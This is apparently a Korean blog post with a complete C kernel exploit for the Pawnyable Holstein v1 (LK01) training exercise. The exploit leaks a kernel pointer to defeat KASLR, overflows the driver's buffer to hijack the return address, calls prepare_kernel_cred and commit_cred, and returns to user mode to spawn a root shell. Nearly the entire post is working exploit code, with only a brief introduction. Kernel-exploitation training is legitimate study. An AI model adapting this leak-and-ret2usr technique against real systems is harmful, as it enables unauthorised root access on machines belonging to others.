Kernel Exploit/Exercise
kernel exploit payload - kaslr
wyv3rn
2025. 5. 30. 12:05
서론
[ Holstein v1 (LK01) - Pawnyable ] 기준으로 작성하였다.
주소 랜덤화(KASLR)가 적용된 경우, read로 필요한 주소를 leak한 뒤 offset을 계산하여 이를 적용한다.
즉, 우선 KASLR을 끈 상태에서 leak 값과 offset을 계산하고, 이를 payload에 반영하면 된다.
Payload
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
/* Size in bytes of the device's kernel buffer that the payload overflows.
 * Not const, so arrays sized from it below are VLAs.
 * NOTE(review): presumably matches the challenge driver's buffer — confirm. */
int kbuf_size = 0x400;
/* Descriptor for /dev/holstein, set by open_dev(). */
int global_fd;
/* Open the challenge device read/write into global_fd.
 * Exits the process with -1 if the device cannot be opened. */
void open_dev()
{
    global_fd = open("/dev/holstein", O_RDWR);
    if (global_fd >= 0)
    {
        puts("[*] Opened device");
        return;
    }
    puts("[!] Failed to open device");
    exit(-1);
}
/* User-mode segment selectors, flags and stack pointer captured by
 * save_state() and consumed by restore_state(); referenced by symbol
 * name from inline asm, so they must stay file-scope globals. */
unsigned long user_cs, user_ss, user_rflags, user_sp;
/* Snapshot the current user-mode CS, SS, RSP and RFLAGS into the globals
 * above so restore_state() can later build an iretq frame from them.
 * Must run before any kernel-mode code path that returns here. */
void save_state(void)
{
__asm__ __volatile__(
"mov %cs, user_cs;"
"mov %ss, user_ss;"
"mov %rsp, user_sp;"
/* RFLAGS has no direct mov; push it and pop into the global. */
"pushf;"
"pop user_rflags;"
);
puts("[*] Saved state");
}
/* Debug helper: print n 8-byte words of leak as "index: hex", one per line.
 * leak must point to at least n readable words. */
void print_leak(unsigned long *leak, unsigned n)
{
    const unsigned long *cur = leak;
    const unsigned long *end = leak + n;
    unsigned idx = 0;
    while (cur != end)
    {
        printf("%u: %lx\n", idx, *cur);
        ++cur;
        ++idx;
    }
}
/* Kernel pointer read out of the device buffer by leak_addr();
 * escalate_privs() derives its function addresses from it. */
unsigned long leak;
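/* Read past the device's kernel buffer and record the word found at index
 * kbuf_size/8 + 1 as the leaked kernel pointer. The read() result is
 * checked: a failed or short read that does not reach that slot would
 * otherwise leave leak equal to the zero from memset and the later
 * offset arithmetic would silently produce garbage. Exits with -1 on error. */
void leak_addr(void)
{
    /* VLA: kbuf_size is a non-const global, so this is sized at run time. */
    unsigned long arry[kbuf_size / 8 + 100];
    const size_t leak_idx = (size_t)(kbuf_size / 8 + 1);
    memset(arry, 0, sizeof(arry));
    ssize_t got = read(global_fd, arry, sizeof(arry));
    if (got < 0)
    {
        perror("[!] read");
        exit(-1);
    }
    /* Only a read that covers the leak slot is meaningful. */
    if ((size_t)got < (leak_idx + 1) * sizeof(arry[0]))
    {
        printf("[!] Short read: %zd bytes, leak slot not reached\n", got);
        exit(-1);
    }
    leak = arry[leak_idx];
    printf("[*] Leak: %lx\n", leak);
}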
/* Landing point after restore_state(): if the process is now uid 0,
 * replace it with /bin/sh (empty environment); otherwise exit with -1. */
void get_shell(void)
{
    puts("[*] Returned to userland");
    if (getuid() != 0)
    {
        printf("[!] UID: %d, didn't get root\n", getuid());
        exit(-1);
    }
    printf("[*] UID: %d, got root!\n", getuid());
    char *argv[] = { "/bin/sh", NULL };
    char *envp[] = { NULL };
    execve("/bin/sh", argv, envp);
}
/* Return address pushed into the iretq frame by restore_state():
 * execution resumes in user mode at get_shell(). */
unsigned long user_rip = (unsigned long)get_shell;
/* Return from kernel to user mode. Swaps GS back to the user base, then
 * pushes the iretq frame in the order the CPU expects — SS, RSP, RFLAGS,
 * CS, RIP — from the values saved by save_state() (RIP = user_rip).
 * Never returns normally; iretq lands in get_shell(). */
void restore_state(void)
{
__asm__ __volatile__(
"swapgs;"
"movq user_ss, %r15;"
"push %r15;"
"movq user_sp, %r15;"
"push %r15;"
"movq user_rflags, %r15;"
"push %r15;"
"movq user_cs, %r15;"
"push %r15;"
"movq user_rip, %r15;"
"push %r15;"
"iretq;"
);
}
/* Kernel function addresses, computed from leak in escalate_privs(). */
unsigned long prepare_kernel_cred;
unsigned long commit_cred;
/* Address of restore_state(), read by symbol name from inline asm. */
unsigned long restore_state_addr = (unsigned long)restore_state;
/* Runs in kernel mode as the overwritten return target. Resolves the two
 * credential functions from the leaked pointer, calls
 * prepare_kernel_cred(0) then commit_cred() with its result, and finally
 * jumps to restore_state() to get back to user mode.
 * The two offsets below are specific to the kernel build the page targets
 * (Holstein v1 / LK01); any other build needs its own values. */
void escalate_privs(void)
{
prepare_kernel_cred = leak - 0xcf0fc;
commit_cred = leak - 0xcefac;
__asm__ __volatile__(
"movq prepare_kernel_cred, %rax;"
/* first argument = 0 */
"xor %rdi, %rdi;"
"call *%rax;"
/* returned cred pointer becomes the argument to commit_cred */
"movq %rax, %rdi;"
"movq commit_cred, %rax;"
"call *%rax;"
"movq restore_state_addr, %rax;"
"call *%rax;"
);
}
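/* Build the overflow payload and write it to the device.
 * Layout (kbuf_size/8 + 2 words): 128 filler words, one padding word, then
 * the address of escalate_privs() as the overwritten return target.
 * write() is not expected to return if the overwrite succeeds; reaching
 * the final puts() therefore means the exploit failed. */
void exploit()
{
    unsigned long payload[kbuf_size / 8 + 2];
    /* Fix: offset was previously declared without an initializer, so the
     * first indexed store read an indeterminate value (undefined behavior). */
    int offset = 0;
    for (int i = 0; i < 128; i++)
    {
        payload[offset++] = 0xdeadbeefdeadbeef;
    }
    payload[offset++] = 0xaaaaaaaaaaaaaaaa;
    payload[offset++] = (unsigned long)escalate_privs;
    unsigned long escal_addr = (unsigned long)escalate_privs;
    printf("[*] Prepared payload : escallte_privs addr = %lx\n", escal_addr);
    write(global_fd, payload, sizeof(payload));
    puts("[!] Error while exploit");
}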
int main()
{
save_state();
open_dev();
leak_addr();
exploit();
puts("[!] Error after exploit");
return 0;
}